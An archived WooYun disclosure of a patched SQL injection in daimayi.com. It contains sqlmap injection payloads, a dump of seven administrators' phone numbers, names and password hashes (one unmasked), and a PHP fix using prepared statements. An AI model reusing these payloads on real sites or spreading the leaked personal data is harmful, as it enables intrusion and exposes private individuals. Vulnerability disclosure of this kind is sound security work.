
Vulnerability summary

Vulnerability ID: wooyun-2015-0112422

Title: SQL injection on the Daimayi main site can leak multiple administrators' information (root privileges)

Vendor: daimayi.com

Author: 路人甲

Submitted: 2015-05-06 16:18

Fixed: 2015-06-20 16:52

Published: 2015-06-20 16:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-06: Details sent to the vendor, awaiting vendor response
2015-05-06: Vendor confirmed; details disclosed to the vendor only
2015-05-16: Details disclosed to core white hats and relevant domain experts
2015-05-26: Details disclosed to regular white hats
2015-06-05: Details disclosed to intern white hats
2015-06-20: Details disclosed to the public

Brief description:

233

Detailed description:

http://www.daimayi.com/index.php/Apply/get_census?code=
root privileges!

Proof of concept:

Parameter: code (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=') AND 8266=8266 AND ('dsZz'='dsZz
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: code=') AND (SELECT * FROM (SELECT(SLEEP(5)))smIz) AND ('qvdz'='qvdz
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: code=') UNION ALL SELECT NULL,NULL,CONCAT(0x7162716a71,0x454c55726d6641706e4c,0x716b716a71),NULL--
---
web server operating system: Windows
web application technology: ASP.NET, PHP 5.5.7
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'root'@'localhost'
available databases [4]:
[*] huomayi
[*] information_schema
[*] mysql
[*] performance_schema
Table: t_admin
[7 entries]
+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+
| id | role_id | sex | status | telphone | password | add_time | true_name | user_name | work_number |
+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+
| 1 | 9 | 0 | 1 | 15529182520 | 585f1869b32b5**968156a0a6b287b1e | 1407848436 | \\u7ba1\\u7406\\u5458 | admin | 001 |
| 10 | 7 | 1 | 1 | 13892365487 | 324cb56bb63a0***47957db3fea0ce76 | 1430102269 | \\u5f20\\u5353\\u5a05 | xiaozhang | 031 |
| 6 | 7 | 1 | 1 | 13893250038 | baaada81ff8c86a**942f05a1e5b6c33 | 1427850240 | \\u674e\\u5a1f | xiaoli | 011 |
| 7 | 8 | 0 | 1 | 13985689234 | d5f79627803de***e7065236da96c35b | 1427969895 | \\u5f20\\u6ce2 | zhangbo | 002 |
| 8 | 8 | 0 | 1 | 18009172450 | b033ae32a829c0d4d3b3d2c26dd721de | 1428408503 | \\u738b\\u6c38\\u5174 | xunxing | 003 |
| 11 | 7 | 0 | 1 | 11111111111 | e45a350aa8d46b***08763425a93c683 | 1430707389 | \\u6d4b\\u8bd5\\u5e10\\u53f7 | liudaye | 123 |
| 9 | 7 | 1 | 1 | 18691733337 | 3b0fc589201c991****2ac9f54e5cd02 | 1428890116 | \\u738b\\u5a77 | wangting | 032 |
+----+---------+-----+--------+-------------+----------------------------------+------------+------------------------------+-----------+-------------+

Remediation:

The passwords have probably been leaked long ago; remember to change them!!!

Copyright notice: please credit the source when reposting: 路人甲@乌云
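Changing passwords does not close the injection itself. As an added illustration of the actual fix (not code from daimayi.com or from this report), below is a hypothetical PHP handler for the `get_census` endpoint in its vulnerable and hardened forms; the table `t_census`, its columns, the `census_ro` account and the password placeholder are assumptions, while the database name `huomayi` comes from the sqlmap output above.

```php
<?php
// Added example, not daimayi.com's code. It assumes a hypothetical
// Apply/get_census handler that looks up one row by the GET parameter "code".

// Vulnerable pattern (constructed): the parameter is spliced into the SQL text,
// so a value such as  ') AND 8266=8266 AND ('x'='x  rewrites the WHERE clause,
// which is exactly what the boolean-based blind payload above exploits.
function get_census_vulnerable(mysqli $db, string $code): ?array {
    $sql = "SELECT id, region, total FROM t_census WHERE (code = '$code')";
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened version: the value is bound as a parameter and is never parsed as
// SQL, so quotes, SLEEP() and UNION in the input have no effect on the query.
function get_census_safe(PDO $db, string $code): ?array {
    // Reject anything outside the expected shape before touching the database.
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $code)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, region, total FROM t_census WHERE code = :code');
    $stmt->execute([':code' => $code]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connect with a least-privilege account (placeholder credentials). The report
// shows the site running as 'root'@'localhost', which let one injection point
// read t_admin; a SELECT-only account limited to the census data cannot.
$db = new PDO(
    'mysql:host=localhost;dbname=huomayi;charset=utf8mb4',
    'census_ro',                           // assumed read-only account, not root
    '<PLACEHOLDER_PASSWORD>',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
    ]
);

$code = isset($_GET['code']) ? (string) $_GET['code'] : '';
header('Content-Type: application/json; charset=utf-8');
echo json_encode(get_census_safe($db, $code));
```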


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-05-06 16:51

Vendor reply:

The information has been changed and our engineers are patching the vulnerability. Thanks!

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2015-05-06 16:36 | r3nty ( Passerby | Rank: 2, Vulnerabilities: 3 )

    Bypassed the dog (WAF)?